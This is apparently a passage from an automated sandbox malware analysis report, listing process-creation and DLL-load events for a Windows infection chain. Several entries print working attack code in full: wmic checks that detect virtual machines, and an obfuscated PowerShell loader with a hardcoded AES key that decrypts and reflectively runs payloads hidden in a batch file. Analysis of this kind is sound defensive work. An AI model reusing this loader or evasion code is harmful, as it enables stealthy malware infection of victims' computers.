Char](97)+''+'n'+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+'d'+'');Write-Output $NMMWPnXAdvF.CreateType();}$SWnYXVUkgpflw=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+'s'+'t'+'e'+''+[Char](109)+''+'.'+'d'+'l'+''+'l'+'')}).GetType(''+[Char](77)+''+[Char](105)+''+'c'+'r'+[Char](111)+''+[Char](115)+''+[Char](111)+''+[Char](102)+'t.'+[Char](87)+'i'+'n'+''+'3'+''+[Char](50)+'.'+'U'+'n'+[Char](115)+''+[Char](97)+''+'f'+''+'e'+''+[Char](78)+''+'a'+''+'t'+''+[Char](105)+''+'v'+''+[Char](101)+''+[Char](77)+''+'e'+''+[Char](116)+''+'h'+'o'+[Char](100)+'s');$AmujSZCroNXavL=$SWnY
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{3837e362-e74e-494b-bcc5-affaf78d43c0}
Source: C:\Windows\System32\dllhost.exeProcess created: C:\Windows\System32\wbem\WMIADAP.exe wmiadap.exe /F /T /R
Source: C:\Windows\System32\dllhost.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\dllhost.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Users\user\Desktop\1.cmd';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] (''));
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] (''));
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{3837e362-e74e-494b-bcc5-affaf78d43c0}
Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: faultrep.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dbgcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
Source: C:\Windows\System32\cmd.exeSection loaded: pdh.dll
Source: C:\Windows\System32\cmd.exeSection loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: faultrep.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dbgcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: faultrep.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dbgcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
